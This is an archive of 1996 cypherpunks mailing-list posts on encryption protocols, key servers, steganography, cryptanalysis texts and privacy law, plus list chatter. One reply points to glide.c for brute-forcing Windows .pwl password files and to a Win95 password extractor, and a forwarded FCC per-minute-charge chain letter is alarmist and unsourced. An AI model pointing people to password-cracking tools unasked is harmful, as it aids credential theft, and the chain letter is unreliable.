To: "'cpunks'" <cypherpunks@toad.com>
Subject: FW: Online Cyberlaw Workshop
Message-ID: <01BB06FC.6E0A13A0@blancw.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


FYI, for anyone here who might be interested.....
   ..
Blanc

----------
From: 	Dick Moores[SMTP:rdm@netcom.com]
Sent: 	Thursday, February 29, 1996 7:26 AM
To: 	SEASIGI
Subject: 	Online Cyberlaw Workshop

(from TOURBUS)

CYBERSPACE LAW FOR NONLAWYERS
-----------------------------

Three highly respected law school professors (Professor Larry Lessig,
University of Chicago Law School; Professor David Post, Georgetown
University Law Center; and Professor Eugene Volokh, UCLA School of Law)
have written a *FREE*, online cyberlaw workshop called, appropriately,
"CYBERSPACE LAW FOR NONLAWYERS."  CYBERSPACE LAW is specifically written
for lay people like you and me, and the workshop's lessons use
easy-to-understand English -- NOT legalese and Latin!


YEAH, BUT WILL I *UNDERSTAND* IT?
---------------------------------

Actually, yes. The workshop's authors really are writing CYBERSPACE LAW's
lessons for educated lay people, *NOT* lawyers.

I took a look at an earlier article written by one of the workshop's
professors (Eugene Volokh, "Cheap Speech and What It Will Do", 104 Yale
L.J.1805 (1995)), and I have to say that I am quite impressed ... although
I have to say that I am quite disappointed that Volokh did not have a
single Southern word *anywhere* in his article :)


WHAT WILL THE WORKSHOP COVER?
-----------------------------

CYBERSPACE LAW is going to help you learn the basic principles of -- and
unlearn some common myths about --

     - copyright law,
     - free speech law,
     - libel law,
     - privacy law,
     - contract law, and
     - trademark law

as they apply on the Net.  Each CYBERSPACE LAW "lesson" should be about the
size of an average TOURBUS post (about a page or two), and will e-mailed to
you through an e-mail distribution list.  The CYBERSPACE LAW workshop will
last a couple of weeks, and you'll get two or three letters a week from the
authors ... and, best of all, the entire workshop is FREE!


THE INSTRUCTORS
---------------

Professor Larry Lessig clerked for U.S. Supreme Court Justice Antonin
Scalia, and now teaches constitutional law and the law of cyberspace at the
University of Chicago Law School.  He's written about law and cyberspace
for the Yale Law Journal and the University of Chicago Legal Forum
(forthcoming).

Professor David Post practiced computer law for six years, then clerked for
U.S. Supreme Court Justice Ruth Bader Ginsburg. He now teaches
constitutional law, copyright law, and the law of cyberspace at the
Georgetown University Law Center.  He's written about law and cyberspace
for the University of Chicago Legal Forum (forthcoming) and the Journal of
Online Law, and writes a monthly column on law and technology issues for
the American Lawyer.

Professor Eugene Volokh worked as a computer programmer for 12 years, and
is still partner in a software company that sells the software he wrote for
the Hewlett-Packard Series 3000.  He clerked for U.S. Supreme Court Justice
Sandra Day O'Connor, and now teaches constitutional law and copyright law
at the UCLA School of Law.  He's written about law and cyberspace for the
Yale Law Journal, Stanford Law Review, Michigan Law Review (forthcoming),
and the University of Chicago Legal Forum (forthcoming).


TO SUBSCRIBE
------------

The CYBERSPACE LAW workshop probably won't start for a month or so, but you
should sign up as soon as you can.  To subscribe to the workshop (for
FREE!) send an e-mail letter to

        LISTPROC-REQUEST@COUNSEL.COM

with the command

        SUBSCRIBE CYBERSPACE-LAW yourfirstname yourlastname

in the body of your e-mail letter, replacing "yourfirstname" and
"yourlastname" with your first and last names.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sat, 2 Mar 1996 14:22:25 +0800
To: cp@proust.suba.com (Alex Strasheim)
Subject: Re: A brief comparison of email encryption protocols
In-Reply-To: <199603010154.TAA05515@proust.suba.com>
Message-ID: <199603010434.XAA10712@homeport.org>
MIME-Version: 1.0
Content-Type: text


Alex Strasheim wrote:

| What's the advantage of using this url type system instead of "fully
| qualified" certificates, ie., attaching all the keys and signatures to the
| object?  Doesn't the give and take with the key servers more than wipe out
| the advantage of the smaller data object?
|
| Does the win come from solving the revocation problem?

	The win from a referenced system can come in two places.
First is standard places for keys, so I can ask a host for its telnetd's
key simply.  Second is that I may already have cached some of the
keys, and not need, for example, they key for toad.com/s/sendmail/

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Gallicchio, Florindo" <FGALLICC@MICRARN2.SSW.JNJ.COM>
Date: Fri, 8 Mar 1996 07:28:25 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <MICRARN2.FGALLICC.533431090096059FMICRARN2@SSW.JNJ.COM>
MIME-Version: 1.0
Content-Type: text/plain




Most humble apologies from a lurker for posting this question to the whole
list.  I couldn't
find the reference in the archives...

About a month or two ago, someone posted some information on that little
piece of code
attached to MS Mail messages alongside the file attachment.  I need to find
out the
vulnerabilities of that code, such as susceptibility to virus, spoof,
attack, etc.

Not crypto related, but important to me nonetheless.

Please send responses to me via e-mail.  Thanks in advance.

Florindo Gallicchio
fgallicc@ncsus.jnj.com

"I don't speak for my company yadda yadda yadda..."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Sat, 9 Mar 1996 19:39:20 +0800
To: cypherpunks@toad.com
Subject: OK, just to incite the rabid...
Message-ID: <960228184524.2023739f@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain


Subj:	Re: new "obscenity" law on the net

inc si
jnz 0166
dec bx

Remember my Christmas Card ?
					Warmly,
						Padgett




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 8 Mar 1996 07:31:59 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199602290317.EAA08427@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


This came from Associated Press (27th Feb) :

============================================================================

Europe pushes Asian weapons sales

KUALA LUMPUR, Malaysia - Russia is doing it. So are Britain, France,
Germany and Spain. Even neutral Sweden has joined the race to sell
warplanes, missiles, tanks and warships for Asia's rapidly expanding
arsenals.

The Europeans, fighting an uphill battle against dominant U.S. competitors,
are offering what the Americans sometimes won't - the newest, deadliest
technology with no political strings attached.

While post-Cold War budget cutting devastated the arms trade in the rest of
the world, military spending in Asia is still rising.

>From 1991 to 1994, Asian sales by Britain, France, Germany and Italy
totaled $3.4 billion - a 30% increase over their sales in the 1987-1990
period, according to figures compiled by economist Digby Waller of the
International Institute of Strategic Studies in London.

By contrast, American weapons sales in the region were $5.4 billion in
1991-1994, a 7% decline from the previous three-year period.

Despite widespread agreement that U.S. weapons makers are technologically
superior, European producers have signed a flurry of deals with nearly
every Asian country.

According to military analysts, buyers were attracted by Europe's lower
prices, equipment - like submarines - that the United States doesn't sell
and - perhaps most important - the chance to avoid becoming dependent on
American suppliers in case the United States cuts back future arms exports.

In one of the most powerful signs of the Asian market's allure, Russia
tossed out ideological considerations in favor of cash, selling its former
Chinese rivals high-performance Sukhoi 27 jet fighters and the technology
to make more.

Thailand bought an aircraft carrier from Spain. Taiwan bought six frigates
and 50 fighter jets from France. South Korea bought three German cruisers
and Malaysia bought two British frigates.

Sweden sold diesel-electric submarines to Thailand and Singapore. The
United States no longer manufactures such vessels, partly in an attempt to
halt their proliferation. Such submarines are very quiet and almost
impossible to detect, even with sophisticated equipment.

Some military analysts argue the unprecedented weapons buildup will ignite
an arms race in a region crisscrossed by territorial disputes. They point
to the growing military might of Japan, China and India and a series of
smoldering regional disputes, including those between Taiwan and China and
between North and South Korea.

Asian governments counter that they're entitled to defend their territory.

"It is wrong to see the purchase of defense equipment by countries in the
region as an arms race,'' Singapore's defense minister, Tony Tan, said in a
TV interview in January.

"We and our ... neighbors are proceeding with plans to modernize our armed
forces, now that our economies have grown and we have the resources to pay
for better weapons and equipment.''

The biggest potential source of conflict in the region is China's feud with
its Southeast Asian neighbors over oil and gas riches in the South China
Sea. China has declared the entire region its territory, and sent warships
to enforce the claim.

While European governments try not to fuel arms races, they may sell to
buyers who are refused American weapons for political reasons, said Paul
Beaver, a military analyst for Jane's Information Group.

Beaver pointed to the example of Britain's $35 billion deal to supply
Tornado fighters and other weapons to Saudi Arabia after the United States
balked at selling warplanes that could be used to attack Israel.

"That has been seen by the Muslim countries in Southeast Asia as a strong
sign that Britain doesn't attach the same political conditions to its sales
as the United States does,'' he said in a telephone interview from London.

Thailand wants to buy advanced American AMRAAM missiles to arm its new F-18
fighters. But because no other country in the region has a missile that
sophisticated, the Clinton administration is hesitating for fear of
sparking competition among Thailand's neighbors to match it.

"If the United States did not want to sell AMRAAM missiles to Thailand, I
wouldn't be surprised if France would be willing to sell a similar
missile,'' said Pieter Wezeman, a researcher for the Stockholm
International Peace Research Institute.

Asian governments also appear to be buying European weapons to diversify
their arsenals in case Washington shuts off their supply.

"The United States has shown several times that they don't want to sell
weapons to everyone, and so at any moment they might start an embargo,''
Wezeman said.

In one of the region's biggest recent sales, Taiwan bought 210 fighter
jets, splitting the order between French Mirage-2000s and U.S.-made F-16s
after Washington first refused to sell and then approved fewer planes than
Taiwan wanted.

Pakistan, blocked by U.S. law from buying F-16s because of evidence it has
built nuclear weapons, is reported to be shopping for French or Russian
warplanes to fill the gap.

By The Associated Press

=============================================================================

no_one@unimportant.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Housley, Russ" <housley@spyrus.com>
Date: Sun, 10 Mar 1996 01:38:06 +0800
To: galvin@eit.com (James M. Galvin)
Subject: Re: [ Death of MOSS? ]
Message-ID: <9601298256.AA825628673@spysouth.spyrus.com>
MIME-Version: 1.0
Content-Type: text/plain




Jim:

>>    And if you look at what I've said previously, it is my firm belief 
>>that if we are to succeed in giving users a truly interoperable secure 
>>email standard, then said standard must be fully and completely 
>>integrated into MIME and do everything it does in the proper MIME way, 
>>as opposed to just being security grafted on.
>
>Allow me to make a contentious statement:
>
>       MOSS is the only secure email protocol integrated with MIME.
>
>You see, integrated to me means that the base is security aware.  MIME is 
>only security aware when the security multiparts are used.  In all other 
>cases, MIME is not security aware.
>
>The use of the application content-type with experimentally defined 
>subtypes gives the appearance of MIME being security aware, but it 
>provides nothing more than a mechanism for carrying a protected object.  
>In addition, the fact that the security service itself must do a callback 
>in order to support recursive services, unlike MOSS which uses the 
>security multiparts framework and thus lets MIME do all the work it was 
>designed to do, further supports my position.

Jim, in what way does the end user distinguish between the MOSS-like 
integration and the S/MIME-and-MSP-like integration?  It seems to me that a 
good user agent implementation provides the same services to the user.

Russ




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Weiss <davidw@hpato.aus.hp.com>
Date: Fri, 8 Mar 1996 07:29:14 +0800
To: cypherpunks@toad.com
Subject: Re: PGP backdoor? (No, I'm not paranoid.)
Message-ID: <4841.825560962@hpautoas.aus.hp.com>
MIME-Version: 1.0
Content-Type: text/plain


jf_avon@citenet.net wrote:
>perry@piermont.com wrote:
>>
[...]
>>Your informant is taking extremely good drugs. You should find out who
>>his connection is should you want to get any.
>>
>>Perry
>
>Dear Perry,
>
[interesting statement of why nothing one hears should ever be discounted]
>
>So, why waste bandwith with a post that apparently mainly seems to be aimed
>at dismissing somebody but brings *absolutely no* new knowledge to 
>the discussion?  Please, next time, post privately.  
Sure it does; Perry's opinion. And what that is worth, depends on the 
reader's opinion of Perry.

>Funny jokes are, IMHO,  welcome because they have some life-enhancing value. 
>
>So please, at least be funny...
I thought it was pretty funny (more so than your post, anyway).

David (I feel another really silly and pointless thread starting...)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 10 Mar 1996 14:01:16 +0800
To: Alan Olsen <cypherpunks@toad.com
Subject: Cryptanalysis
Message-ID: <ad5b7b8a07021004455b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:32 PM 2/29/96, Alan Olsen wrote:

>Here is the problem...  I am looking for texts on the breaking
>of cyphers.  (I want to show him WHY the cypher is insecure and
>not just say "<scottish accent>It's crap!</Scottish accent>".)
>I have done a couple of searches and have come up fairly dry.

There are several places to look:

* The Aegean Park Press line of books on military cryptanalysis, mostly the
books by Friedman and his associates. Computer Literacy (on the Web)
carries most of them. (Also mentioned in various crypto FAQs, as I recall.)

However, these books are based on work done in WWII and the following
decade(s), so the stuff is pretty dated. Still, nearly any "snake oil
crypto" system, such as it sounds like your friend is building, will likely
be far weaker than the ciphers the NSA was attacking back in the early
days.

(I just noticed that Bill Frantz made the same comments about the Friedman
books. By the way, our own John Gilmore was instrumental in getting one of
the last ones out into print; as I recall, he found one of them in a public
library, and thus Aegean Park Press was able to republish it without the
NSA stopping them.)

* Several textbooks have good chapters on cryptanalysis, often buried in
the "problems" section. I think Denning's book has a good chapter on the
methods.

* The journal "Cryptologia" is largely devoted to amateur cryptanalysis.

>The Cyphernomicon has a couple of paragraphs, but nothing on
>techniques or pointers to other references.  RSA's FAQ has
>little to nothing as well. A web search turned up little
>useful. Most of the other references I have found have been for
>current cyphers, but next to nothing about breaking them.

There are very good reasons to say little about "conventional
cryptanalysis": it just doesn't matter much with modern ciphers, such as
public key systems. Modern ciphers don't fall to conventional attacks based
on word frequency, pattern analysis, etc.

Your friend is on a hopeless task. If he doesn't understand just how
hopeless it is to develop a homegrown, conventional cipher then he's
certainly not likely to take the time to become a skilled amateur
cryptanalyst.

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 8 Mar 1996 10:04:04 +0800
To: cme@cybercash.com (Carl Ellison)
Subject: Re: A brief comparison of email encryption protocols
In-Reply-To: <v02140b24ad5bc8a12abb@[204.254.34.231]>
Message-ID: <199602292135.QAA18937@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Carl Ellison writes:
> At 15:54 2/29/96, Derek Atkins wrote:
> >So, there needs to be a compromise, some shorthand method to describe
> >the hint.  One solution is to provide a "keyserver" type and then some
> >string that says which "keyserver" to use.  For example, if there is a
> >DNS-style keyserver deplyed, I could put '1,"mit.edu"' in all my
> >signatures, if we assume that '1' is the DNS-style keyserver code.
> >
> >I'm sure there are other possible solutions as well, and any real
> >suggestions are welcome.
> 
> is a URL just too big?  My sigs are already several lines long.  E.g.,
> 
> Key: ftp://ftp.clark.net/pub/cme/cme.asc

URLs are nice, but I'm not quite sure they are sufficient in practice,
though they are certainly theoretically sufficient. If I get a
document from someone, and it is signed, I'd like to be able to get
the key associated with the signature, and the URL is in theory enough
to do that. However, going in the opposite direction -- retrieving a
key associated with, say, a remote host's TELNET server, I'd like to
be able to query a server ask much more flexible questions than an FTP
URL would let me ask -- I might have a prefered public key system (RSA
versus DSS or what have you), I might want to be able to distinguish
between versions of the key, I might want to ask for all keys of a
certain class, etc.

In the end, we are probably going to need something in the way of key
servers, which may (or may not) imply either a new type of URL or
something other than a URL to do retrieval off of.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 8 Mar 1996 09:58:49 +0800
To: Derek Atkins <warlord@mit.edu>
Subject: Re: A brief comparison of email encryption protocols
In-Reply-To: <199602292139.QAA18366@toxicwaste.media.mit.edu>
Message-ID: <199602292202.RAA19004@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Derek Atkins writes:
> > is a URL just too big?  My sigs are already several lines long.  E.g.,
> > 
> > Key: ftp://ftp.clark.net/pub/cme/cme.asc
> 
> IMHO, yes.  Consider for a minute: there are currently about 20000 PGP
> keys on the public keyservers.  There are about 30000 signatures on
> those keys.  The keyrings are already 8MB or more.
> 
> Now, consider adding a URL to every signature.  Lets even use your
> URL, which is 35 characters long (and lets not even count the NULL or
> length byte).  Adding this URL to 30000 signatures would add 1050000
> bytes, or just over 1MB.  This is an increase in 12% of the keyrings!

Yes, but we have to assume that the need for central key servers would
go away if we had a way of distributing the data around, which would
reduce the problem substantially...

> On the other hand, using my method and your "URL" (clark.net) would
> add only 10 bytes per sig, or 300k.  This is only a 4% increase.

By the way, a lot of this discussion should probably also be taking
place on SPKI.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Fri, 8 Mar 1996 09:57:08 +0800
To: perry@piermont.com
Subject: Re: A brief comparison of email encryption protocols
In-Reply-To: <199602292202.RAA19004@jekyll.piermont.com>
Message-ID: <199602292208.RAA19010@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> Yes, but we have to assume that the need for central key servers would
> go away if we had a way of distributing the data around, which would
> reduce the problem substantially...

Oh, of course the central keyserver model would disappear, but I'm
still trying to design a system which is as compact as possible.

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 10 Mar 1996 14:01:39 +0800
To: cypherpunks@toad.com
Subject: Chaff in the Channel (Stealth PGP work)
Message-ID: <ad5b906f080210042e09@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:32 PM 2/29/96, Bruce Zambini wrote:

>Well, that's what I want to avoid; I think the issue is that as long as
>stego is predictable, there's a problem, ie a message to a certain party
>can be shown to exist, even if it's not readable. This might prove more
>than ample evidence in certain circumstances.
>
>You shouldn't be able to recover the stego'd message without special
>knowledge.  This isn't addressed by current software, to my knowledge.

Sorry if I haven't been following the latest "stego" messages too closely.

If it is desired that an image, say, carry a steganographic message that is
"undetectable" to adversaries, then much more than just stripping off the
PGP markers (headers, identifying bits, whatever) must be done: the LSB bit
plane, if this is the stego channel, must have statistics which are
indistinguishable from "normal" LSB bit planes of images. (Not an easy
thing to define or to implement, but there you go.)

So, when the Khmer Rouge People's Enforcement Division looks at the image
they have confiscated from your computer and examines the LSB bit plane for
evidence of human rights files encrypted steganographically, that bit plane
had better not have unusual statistics...it had better not look "too"
random, as real life LSB randomness may not have nearly the entropy of PGP
randomness, say.

What can be done?

One emergent standard could be to the following:

- when images are sent, or stored, replace the true LSB bit plane (I say
"true" to distinguish the actual "grey levels" of one or more of the color
bit planes from RGB encodings in which the nominal LSB is not at all the
minimum brightness changes) with a "PGP chaff image."

- this PGP chaff image could be randomly generated, or chosen from a
library, or (surprise, surprise) actually be an encoded message.

- the point is that some percentage of all images would have this chaff
present, so that mere possession of an image with the offending statistics
would not ipso facto be proof of possession of an encrypted/stegoized
message.

(Of course, the Khmer Rouge People's Enforcement Division might simply kill
you anyway, but then they might kill you for merely having a computer. One
would hope that Reno's Raiders would not do likewise, and that the
existence of multiple images with "chaff" image planes would be sufficient
to confuse things.)

- the adversary may know you have an image with a chaff plane, but he
doesn't know that you actually know how to decode that chaff, that that
chaff is not chaff to you.

[How is this any different from simply sending chaff messages
conventionally, without using steganography? Why not use the full
bandwidth? Answer: Stego provides some plausible deniability, more
important in court cases in the U.S. than to the Khmer Rouge, of course.
Having random messages filling up one's hard disk is suspicious, but having
images of the Mona Lisa which _may_ contain stego bits and which _may_ be
readable by the owner is considerably less suspicion-arousing.]

This is my take on fixing the stego situation. Instead of worrying about a
"stealth PGP version," which is likely to be only a slight speed bump
(because of the statistics), think about flooding the detection channels.

Longterm, however, I certainly think that cryptographic messages can be
made virtually indistinguishable from low-order bit noise. (I have argued
this since the late 1980s, so I'm not changing my views now.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nibiru <nibiru@columbus.co.za>
Date: Thu, 28 Mar 1996 22:01:22 +0800
To: "cypherpunks@toad.com>
Subject: unsubscrive
Message-ID: <199603281249.KAA06158@intp1.columbus.co.za>
MIME-Version: 1.0
Content-Type: text/plain


unsubscrive cypherpunks


-------------------------------------------------------------------
NIBIRU                                  
E-Mail : nibiru@columbus.co.za
South-Africa                                                          
--------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nibiru <nibiru@columbus.co.za>
Date: Sat, 30 Mar 1996 02:38:01 +0800
To: cypherpunks@toad.com
Subject: Re: NOISE: Scriveners Attack C-Punks
Message-ID: <199603291452.MAA09117@intp1.columbus.co.za>
MIME-Version: 1.0
Content-Type: text/plain



>Watch out folks... the scriveners are after us!  No doubt in cahoots with
teh exonites!


Take this dweeb ** BONK ** .






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Adrian <chow@niven.imsweb.net>
Date: Thu, 6 Feb 1997 15:01:39 -0800 (PST)
To: cyberpunks <cypherpunks@toad.com>
Subject: EXTRA CHARGE FOR INTERNET SERVICE !
Message-ID: <199702062301.PAA02239@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Just received this from another mailing list.  PLEASE FORWARD TO ALL 
INTERESTED PARTIES


 I am writing you this to inform you of a very important matter
 currently under review by the FCC. Your local telephone company has
 filed a proposal with the FCC to impose per minute charges for your
 internet service. They contend that your usage has or will hinder the
 operation of the telephone network.

 It is my belief that internet usage will diminish if users were
 required to pay additional per minute charges. The FCC has created an
 email box for your comments, responses must be received by February
 13, 1997. Send your comments to isp@fcc.gov and tell them what you
 think.

 Every phone company is in on this one, and they are trying to sneak
 it in just under the wire for litigation. Let everyone you know here
 this one. Get the e-mail address to everyone you can think of.

 isp@fcc.gov

 Please forward this email to all your friends on the internet so all
 our voices may be heard!


It's time to let them know just who is paying their salaries. Don't sit
back and be
quite on this one, SPEAK YOUR MIND, LET THEM KNOW THIS IS 
BULLSHIT !!!!!!!!!!

 Just passing it along...

Brian Adrian 
e-mail: chow@niven.imsweb.net
Web page: http://home.imsweb.net/~chow/







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian Adrian" <chow@niven.imsweb.net>
Date: Thu, 6 Feb 1997 13:30:45 -0800 (PST)
To: "cyberpunks" <cypherpunks@toad.com>
Subject: EXTRA CHARGE FOR INTERNET SERVICE !
Message-ID: <199702062129.VAA26030@niven.imsweb.net>
MIME-Version: 1.0
Content-Type: text/plain


Just received this from another mailing list.  PLEASE FORWARD TO ALL 
INTERESTED PARTIES


 I am writing you this to inform you of a very important matter
 currently under review by the FCC. Your local telephone company has
 filed a proposal with the FCC to impose per minute charges for your
 internet service. They contend that your usage has or will hinder the
 operation of the telephone network.

 It is my belief that internet usage will diminish if users were
 required to pay additional per minute charges. The FCC has created an
 email box for your comments, responses must be received by February
 13, 1997. Send your comments to isp@fcc.gov and tell them what you
 think.

 Every phone company is in on this one, and they are trying to sneak
 it in just under the wire for litigation. Let everyone you know here
 this one. Get the e-mail address to everyone you can think of.

 isp@fcc.gov

 Please forward this email to all your friends on the internet so all
 our voices may be heard!


It's time to let them know just who is paying their salaries. Don't sit
back and be
quite on this one, SPEAK YOUR MIND, LET THEM KNOW THIS IS 
BULLSHIT !!!!!!!!!!

 Just passing it along...

Brian Adrian 
e-mail: chow@niven.imsweb.net
Web page: http://home.imsweb.net/~chow/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven L Baur <steve@miranova.com>
Date: Mon, 5 Feb 96 11:09:48 PST
To: cypherpunks@toad.com
Subject: Re: fcpunx subscribe (FCPUNX is not on miranova.com)
In-Reply-To: <4C254DF0F18@sjulaw.stjohns.edu>
Message-ID: <m2g2cppoxw.fsf_-_@miranova.com>
MIME-Version: 1.0
Content-Type: text/plain


Although this particular request was sent to the cypherpunks mailing
list, others continue to send requests to my mailbox.

>>>>> "Wendy" == "Wendy Fu" <WFU@sjulaw.stjohns.edu> writes:

Wendy> endWendy Fu, Network Manager 
Wendy> St. John's University School of Law
Wendy> 8000 Utopia Parkway, Jamaica, NY 11439
Wendy> E-Mail Address: wfu@sjulaw.stjohns.edu
Wendy> Phone: (718)990-1666

I don't know how my address got associated with this list, but please,
*do not* send requests about FCPUNX to steve@miranova.com.

Requests about how to set up Gnus scoring for performing your own
filtering of the cypherpunks list are welcome.

-- 
steve@miranova.com baur
Unsolicited commercial e-mail will be proofread for $250/hour.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Mon, 5 Feb 96 10:53:06 PST
To: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Subject: Re: Sometimes ya just gotta nuke em
In-Reply-To: <Pine.BSD.3.91.960204043412.13565C-100000@ahcbsd1.ovnet.com>
Message-ID: <Pine.SV4.3.91.960205133946.21142A-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain



<<"In other words it was stvation/devastation city">>

  It was lot worse than that on the Japanese-imperialits occupied islands 
of the Pacific when the Nisei troops choosenot to surrender and instead, 
mad last-ditch charges against AMerican lines - which killed not a small 
number of Americans. And of course, there were the suicide bombers.

Submarine operations don't cost zero lives, either. In fact, just plain 
old regular military logistics - keeping the boys mobilized and in place 
ina theatre of operations - don't cost zero lives, even if there are _no_ 
hostilities.

And while all the starvation and devastation was going on in Japanese
cities, the Japanese troops were torturing and murdering Allied POWs, and
Asian civilains in all the Japanese-occupied teritories. Those people
deserved liberation, too. 

I think you give your game away when you complain about how we were being 
unfair to Comrade Stalin.

As far as Pax Americana goes, the Japanese just _volunteered_ to_increase_
the payments they make to support the American garrison in Japan. The
non-Okinawans want us in their country. I guess they know that the
alternative is a Red Chinese garrison. 

And lots of other Asians are afraid of the same alternative - or of 
Japanese garrisons in their homeland. THey've "been there, done that".

Alan Horowitz 
alanh@norfolk.infi.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Mon, 5 Feb 96 10:37:59 PST
To: Pot@networking.stanford.edu
Subject: Re: "Can't we all just get along?"
In-Reply-To: <199602050758.XAA04847@Networking.Stanford.EDU>
Message-ID: <Pine.BSD.3.91.960205183841.7660B-100000@usr6.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 4 Feb 1996 Pot@networking.stanford.edu wrote:

> This is not FLAMEpunks.
> 
	WHAT???   --and miss all the fun?


__________________________________________________________________________
    go not unto usenet for advice, for the inhabitants thereof will say:
      yes, and no, and maybe, and I don't know, and fuck-off.
_________________________________________________________________ attila__

    To be a ruler of men, you need at least 12 inches....
    There is no safety this side of the grave.  Never was; never will be.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 9 Feb 96 18:27:02 PST
To: Jim Small <small@nethole.com>
Subject: Re: glide.c??
In-Reply-To: <199602092027.UAA04128@ex500.saic.com>
Message-ID: <Pine.ULT.3.91.960209192906.16048I-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 9 Feb 1996, Jim Small wrote:

> DO you know where I can find glide.c , or (newer) to bruteforce
> .pwl files?

http://www.c2.org/hackmsoft/

There will also be a utility for extracting and decrypting file sharing
(Win95 as server) passwords as soon as the code is refined and the ReadMe 
is written.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 9 Feb 96 18:29:04 PST
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Fair Credit Reporting Act and Privacy Act
Message-ID: <199602100357.TAA22191@ix10.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:28 AM 2/9/96 -0500, Duncan wrote, regarding the appallingly
invasive British Privacy Act:

>Computer bureaux which process personal data for others or allow data users
>to process personal data on their computers must also register. Their
>register entries will contain only their name and address.
>
>Data users and computer bureaux who should register but do not, are
>committing a criminal offence, as are those operating outside the
>descriptions contained in their register entries. In these cases the
>Registrar regularly prosecutes. The penalty for non-registration can be a
>fine of up to £5,000 plus costs in the Magistrates Courts, or an unlimited
>fine in the Higher Courts."

Ouch - does this mean that if you offer shell accounts, you either have
to contractually limit the processing your users may do, or be fined
as a criminal for not registering?

#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com / billstewart@attmail.com +1-415-442-2215
# http://www.idiom.com/~wcs





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 9 Feb 96 18:29:15 PST
To: Tim Philp <bplib@wat.hookup.net>
Subject: Re: Fair Credit Reporting Act and Privacy Act
Message-ID: <199602100357.TAA22245@ix10.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:21 AM 2/9/96 -0500, Tim Philp wrote:
>	Private individuals are not what I was refering to. I am more
>concerned about corporations who hold information about me and release it
>to the highest bidder. When it comes to individual versus corporate
>rights, I am clearly on the side of the individual. 

Remember that there's a major difference between "corporations"
and "business"; you seem to be mixing them up.  A corporation is
a legal fiction that treats a cooperative effort by one or more people
as if it were a person in itself, and normally involves limiting the
liability of the corporation's investors by putting it all on the
fictional person.  A business is what one or more people do to make money.
Most corporations are businesses, though not all.

Governments can legitimately tell corporations what to do because
that's part of the price of the legal fiction; a government can't
abuse a corporation because you can't beat up a legal fiction,
though it can say "Poof!  You're not a legal fiction any more",
and conversely, if the people who own the legal fiction don't like
